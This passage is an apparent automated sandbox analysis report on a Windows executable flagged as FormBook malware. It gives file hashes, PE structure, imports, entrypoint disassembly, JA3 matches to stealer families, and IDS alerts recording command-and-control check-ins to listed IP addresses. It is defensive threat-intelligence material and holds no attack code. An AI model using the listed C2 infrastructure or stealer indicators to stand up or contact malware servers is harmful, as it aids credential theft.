                                                                                                                                        https://email.email.pandadoc.net/c/eJxUkMtu2zoQhp9G3NkQhxQlLbRIjo8QpKjRS5qi3QTD4TCmZYuyRNm1nr4w0PSyGwzmG3z_7xprlPWVcJHmI_fpJbjmguOnLn78cm0vTw-4fw8_dttdENzIEmoji9oYsWsAtST2VKmiVOSoJqdyVNYa9pUnKUIDOWiZA0hTgDZrUNoXnphIopaly3TORwyH9YC9Qxdp3XMSYXpJIxKjPXCTxpnFodmlNEyZusugzaDFYfiDUDxm0L7pZ9CeIVNtih33mdpIlF4hGzaGIM8ta2mV83UNlbFYlJCbQhsoM9WKPqbgA2EKsb_VACXX1jKtlM9hpQHcqiKvVsZXuvB16WTBIo6v2IflN7T_8Ly_7-p6G_bz4wbM8n1Sp6MYG7ePPU-Zzu186Pg0H4abuhj5HKZfrF4mPLvT5vndMpR0h183E0MpUvOW7q9xlXB85X820-3i3IC4xLGbBiS-Pf3v-o2eUuge_l-21bG_2vt-fvz8MwAA__9XraZ6Get hashmaliciousUnknownBrowse
                                                                                                                                        • 44.236.119.144
                                                                                                                                        https://careers.adobe.com/us/en/apply?jobSeqNo=ADOBUSR147673EXTERNALENUSGet hashmaliciousUnknownBrowse
                                                                                                                                        • 13.227.219.26

                                                                                                                                        JA3 Fingerprints

                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                        a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                        • 185.166.143.48
                                                                                                                                        • 3.5.3.65
                                                                                                                                        • 54.231.236.129
                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                        • 185.166.143.48
                                                                                                                                        • 3.5.3.65
                                                                                                                                        • 54.231.236.129
                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                        • 185.166.143.48
                                                                                                                                        • 3.5.3.65
                                                                                                                                        • 54.231.236.129
                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                        • 185.166.143.48
                                                                                                                                        • 3.5.3.65
                                                                                                                                        • 54.231.236.129
                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                        • 185.166.143.48
                                                                                                                                        • 3.5.3.65
                                                                                                                                        • 54.231.236.129
                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                        • 185.166.143.48
                                                                                                                                        • 3.5.3.65
                                                                                                                                        • 54.231.236.129
                                                                                                                                        AcrobatAvj.7zGet hashmaliciousUnknownBrowse
                                                                                                                                        • 185.166.143.48
                                                                                                                                        • 3.5.3.65
                                                                                                                                        • 54.231.236.129
                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                        • 185.166.143.48
                                                                                                                                        • 3.5.3.65
                                                                                                                                        • 54.231.236.129
                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                        • 185.166.143.48
                                                                                                                                        • 3.5.3.65
                                                                                                                                        • 54.231.236.129
                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                        • 185.166.143.48
                                                                                                                                        • 3.5.3.65
                                                                                                                                        • 54.231.236.129

                                                                                                                                        Dropped Files

                                                                                                                                        No context

                                                                                                                                        Created / dropped Files

                                                                                                                                        C:\Users\user\AppData\Local\Temp\dGg-0-kL

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\SysWOW64\takeown.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                                                                        Category:modified
                                                                                                                                        Size (bytes):196608
                                                                                                                                        Entropy (8bit):1.1215420383712111
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                                                                                        MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                                                                                        SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                                                                                        SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                                                                                        SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                                                                                        Malicious:false
                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                        Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        Static File Info

                                                                                                                                        General

                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                        Entropy (8bit):6.942461389038916
                                                                                                                                        TrID:
                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.81%
                                                                                                                                        • Windows Screen Saver (13104/52) 0.13%
                                                                                                                                        • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                        File name:z10982283782.exe
                                                                                                                                        File size:1'114'112 bytes
                                                                                                                                        MD5:3138edfdc34f754c5f31088f00ae239d
                                                                                                                                        SHA1:2251e5474cc5af3619f99ee9c6c0042c10b089a6
                                                                                                                                        SHA256:a1f257ec69c19785880ec7a051e3a4030a2edf055fd2e00f7f7f58c43d563cac
                                                                                                                                        SHA512:1325dc1b872d3972fcc5552a81363e6200490cdcc555073e24ed559dffb24429d1c4ea5dd4a350cea239f339ed00688695138343c95fb40fff9c6f8f8d99714b
                                                                                                                                        SSDEEP:24576:rCtVqnbUQ25Qm2Xzv3333333333333333333333333333333333333333333333f:rkabm4Yc3qrWyuv
                                                                                                                                        TLSH:2035BF13A6964433C19305789E6792997E393F302E39A9BD79F87E8C8F342603875277
                                                                                                                                        File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                                                        File Icon

                                                                                                                                        Icon Hash:bae2a2b2baa2cba1

                                                                                                                                        Static PE Info

                                                                                                                                        General

                                                                                                                                        Entrypoint:0x46e754
                                                                                                                                        Entrypoint Section:.itext
                                                                                                                                        Digitally signed:false
                                                                                                                                        Imagebase:0x400000
                                                                                                                                        Subsystem:windows gui
                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                        DLL Characteristics:
                                                                                                                                        Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                                        TLS Callbacks:
                                                                                                                                        CLR (.Net) Version:
                                                                                                                                        OS Version Major:4
                                                                                                                                        OS Version Minor:0
                                                                                                                                        File Version Major:4
                                                                                                                                        File Version Minor:0
                                                                                                                                        Subsystem Version Major:4
                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                        Import Hash:be622105a275afb1f62a7a713bbb6f71

                                                                                                                                        Entrypoint Preview

                                                                                                                                        Instruction
                                                                                                                                        push ebp
                                                                                                                                        mov ebp, esp
                                                                                                                                        add esp, FFFFFFF0h
                                                                                                                                        mov eax, 0046DA38h
                                                                                                                                        call 00007F5398D50B59h
                                                                                                                                        mov eax, dword ptr [004FFD50h]
                                                                                                                                        mov eax, dword ptr [eax]
                                                                                                                                        call 00007F5398DA40C1h
                                                                                                                                        mov ecx, dword ptr [004FFE48h]
                                                                                                                                        mov eax, dword ptr [004FFD50h]
                                                                                                                                        mov eax, dword ptr [eax]
                                                                                                                                        mov edx, dword ptr [0046D4BCh]
                                                                                                                                        call 00007F5398DA40C1h
                                                                                                                                        mov eax, dword ptr [004FFD50h]
                                                                                                                                        mov eax, dword ptr [eax]
                                                                                                                                        call 00007F5398DA4135h
                                                                                                                                        call 00007F5398D4E93Ch
                                                                                                                                        lea eax, dword ptr [eax+00h]
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al

                                                                                                                                        Data Directories

                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x1040000x2624.idata
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x1110000x7400.rsrc
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x1090000x77dc.reloc
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x1080000x18.rdata
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x10471c0x5f0.idata
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                        Sections

                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                        .text0x10000x6cc780x6ce00679cf292fba315b6c48b5a741b8454bbFalse0.5194034335533869data6.517423558240271IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                        .itext0x6e0000x79c0x800fa65958be65a2ac83e154aceab0589f4False0.60302734375data6.045874841150347IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                        .data0x6f0000x90eec0x91000f92cbfa15bfdbf1a608dec2cded70c01False0.40102033943965515data6.452367913242279IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                        .bss0x1000000x36980x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                        .idata0x1040000x26240x2800b1bfe93062ceb3b72b5c8ffaf7d76f51False0.309375data4.932588648062451IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                        .tls0x1070000x340x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                        .rdata0x1080000x180x20059811057491060781d7ae66a52c18a9dFalse0.05078125data0.2108262677871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                        .reloc0x1090000x77dc0x7800b8d7f554a4786b460cb72f0a76971854False0.6180013020833334data6.674684604138178IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                        .rsrc0x1110000x74000x74000a0a6a5e87122c82d5a795b89dd7859fFalse0.39075969827586204data5.432103449175903IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                        Resources

                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                        RT_CURSOR0x111a880x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                                                                                        RT_CURSOR0x111bbc0x134dataEnglishUnited States0.4642857142857143
                                                                                                                                        RT_CURSOR0x111cf00x134dataEnglishUnited States0.4805194805194805
                                                                                                                                        RT_CURSOR0x111e240x134dataEnglishUnited States0.38311688311688313
                                                                                                                                        RT_CURSOR0x111f580x134dataEnglishUnited States0.36038961038961037
                                                                                                                                        RT_CURSOR0x11208c0x134dataEnglishUnited States0.4090909090909091
                                                                                                                                        RT_CURSOR0x1121c00x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                                                                                        RT_BITMAP0x1122f40x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                                                                                        RT_BITMAP0x1124c40x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 380EnglishUnited States0.46487603305785125
                                                                                                                                        RT_BITMAP0x1126a80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                                                                                        RT_BITMAP0x1128780x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39870689655172414
                                                                                                                                        RT_BITMAP0x112a480x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.4245689655172414
                                                                                                                                        RT_BITMAP0x112c180x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5021551724137931
                                                                                                                                        RT_BITMAP0x112de80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5064655172413793
                                                                                                                                        RT_BITMAP0x112fb80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                                                                                        RT_BITMAP0x1131880x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5344827586206896
                                                                                                                                        RT_BITMAP0x1133580x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                                                                                        RT_BITMAP0x1135280xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.4870689655172414
                                                                                                                                        RT_ICON0x1136100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/m0.5184647302904565
                                                                                                                                        RT_DIALOG0x115bb80x52data0.7682926829268293
                                                                                                                                        RT_DIALOG0x115c0c0x52data0.7560975609756098
                                                                                                                                        RT_STRING0x115c600x104data0.6192307692307693
                                                                                                                                        RT_STRING0x115d640x2ccdata0.4790502793296089
                                                                                                                                        RT_STRING0x1160300xc0data0.6770833333333334
                                                                                                                                        RT_STRING0x1160f00xecdata0.6483050847457628
                                                                                                                                        RT_STRING0x1161dc0x358data0.433411214953271
                                                                                                                                        RT_STRING0x1165340x3d8data0.38109756097560976
                                                                                                                                        RT_STRING0x11690c0x388data0.4092920353982301
                                                                                                                                        RT_STRING0x116c940x3f0data0.35119047619047616
                                                                                                                                        RT_STRING0x1170840x190data0.4975
                                                                                                                                        RT_STRING0x1172140xccdata0.6225490196078431
                                                                                                                                        RT_STRING0x1172e00x1c4data0.5376106194690266
                                                                                                                                        RT_STRING0x1174a40x3c8data0.3181818181818182
                                                                                                                                        RT_STRING0x11786c0x338data0.42961165048543687
                                                                                                                                        RT_STRING0x117ba40x294data0.42424242424242425
                                                                                                                                        RT_RCDATA0x117e380x10data1.5
                                                                                                                                        RT_RCDATA0x117e480x2f8data0.7092105263157895
                                                                                                                                        RT_RCDATA0x1181400x1c2Delphi compiled form 'TForm1'0.7288888888888889
                                                                                                                                        RT_GROUP_CURSOR0x1183040x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                        RT_GROUP_CURSOR0x1183180x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                        RT_GROUP_CURSOR0x11832c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                        RT_GROUP_CURSOR0x1183400x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                        RT_GROUP_CURSOR0x1183540x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                        RT_GROUP_CURSOR0x1183680x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                        RT_GROUP_CURSOR0x11837c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                        RT_GROUP_ICON0x1183900x14data1.25

                                                                                                                                        Imports

                                                                                                                                        DLLImport
                                                                                                                                        oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                                                        advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                                                        user32.dllGetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
                                                                                                                                        kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                                                                                                                        kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                                                                        user32.dllCreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassNameA, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, ChildWindowFromPoint, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                                                                        gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExtTextOutA, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
                                                                                                                                        version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                                                                                        kernel32.dlllstrcpyA, lstrcmpA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryExA, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileAttributesA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                                                                                                                        advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
                                                                                                                                        ole32.dllCoTaskMemAlloc, CoCreateInstance, CoUninitialize, CoInitialize
                                                                                                                                        kernel32.dllSleep
                                                                                                                                        oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                                                                                                                        comctl32.dll_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls

                                                                                                                                        Possible Origin

                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                        EnglishUnited States

                                                                                                                                        Network Behavior

                                                                                                                                        Suricata IDS Alerts

                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                        2024-10-23T07:02:49.845749+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.7498783.33.130.19080TCP
                                                                                                                                        2024-10-23T07:03:06.830909+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.75963374.48.31.12380TCP
                                                                                                                                        2024-10-23T07:03:09.378022+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.75964474.48.31.12380TCP
                                                                                                                                        2024-10-23T07:03:11.940326+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.75965074.48.31.12380TCP
                                                                                                                                        2024-10-23T07:03:21.450730+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.75965174.48.31.12380TCP
                                                                                                                                        2024-10-23T07:03:27.366251+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.759652161.97.168.24580TCP
                                                                                                                                        2024-10-23T07:03:29.881280+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.759653161.97.168.24580TCP
                                                                                                                                        2024-10-23T07:03:32.440366+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.759654161.97.168.24580TCP
                                                                                                                                        2024-10-23T07:03:35.010762+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.759655161.97.168.24580TCP
                                                                                                                                        2024-10-23T07:03:41.737445+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.759656154.23.184.24080TCP
                                                                                                                                        2024-10-23T07:03:44.799857+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.759657154.23.184.24080TCP
                                                                                                                                        2024-10-23T07:03:47.347468+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.759658154.23.184.24080TCP
                                                                                                                                        2024-10-23T07:03:50.377967+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.759659154.23.184.24080TCP
                                                                                                                                        2024-10-23T07:03:56.709964+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.759660194.58.112.17480TCP
                                                                                                                                        2024-10-23T07:03:59.356558+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.759661194.58.112.17480TCP
                                                                                                                                        2024-10-23T07:04:01.912056+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.759662194.58.112.17480TCP
                                                                                                                                        2024-10-23T07:04:04.448344+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.759663194.58.112.17480TCP
                                                                                                                                        2024-10-23T07:04:10.480043+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.7596643.33.130.19080TCP
                                                                                                                                        2024-10-23T07:04:13.017875+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.7596653.33.130.19080TCP
                                                                                                                                        2024-10-23T07:04:16.229747+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.7596663.33.130.19080TCP
                                                                                                                                        2024-10-23T07:04:18.810436+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.7596673.33.130.19080TCP
